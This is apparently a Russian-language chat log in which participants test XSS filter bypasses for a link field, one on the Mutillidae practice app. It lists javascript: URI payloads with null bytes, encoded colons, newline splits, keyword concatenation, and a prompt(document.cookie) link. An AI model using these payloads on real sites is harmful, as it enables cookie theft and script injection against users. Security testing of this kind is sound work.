ЭК
создай у себя локальный файл и проверь лично
На мутиллидае проверю.
Size: a a a
2020 May 30
ЭК
Отработало просто с хреф, ща попробую с http
I
а теперь добавь свои %00, которые ты напридумывал
I
%00javascript:alert()
%00javascript%00:alert()
%00javascript%00:alert()
ЭК
Бэд реквест да.
ЭК
Был не прав, извиняюсь.
᠌
Обнаружил что если поставить "#/?\" перед запросом, то весь запрос пропускает типа
#javascript:alertЭК
# это коментарий кажется, оно будет пропускать всё что идёт после него без обработки.
᠌
Ну ?javascript:alert() и /javascript:alert() тоже работает
᠌
Может есть какие-то секретные байпассы типа "/%0ajavascript:alert()" (спойлер это не работает)
ЭК
C # не будет работать, это комент.
自
Может есть какие-то секретные байпассы типа "/%0ajavascript:alert()" (спойлер это не работает)
Я хз, но попробуй заменить : на \u003a
自
Но там вроде тока с функциями работает
᠌
Я хз, но попробуй заменить : на \u003a
Firefox парсит это как
href=javascript/u003aalert()I
Может что-нибудь из этого пролезет?
<a href="j
avascript:prompt(document.cookie)">asdasd</a><br>
<a href="javascript:this['a'+'lert']`1`">asdasd</a><br>
<a href="javascript://google.com/?x=%0Aalert`Hello!`">asdasd</a><br>
<a href="javascript://%0aalert();">asdasd</a><br>
<a href="javascript:alert(1)">asdasd</a><br>
<a href="javascript:alert()">asdasd2</a><br>
I
соответственно сущностями типа

можно "разбить" схему javascript и это не поломает вектор
᠌
К сажелению из за кодировки & -> & это не будет работат, а третий и четвертый снизу блокируется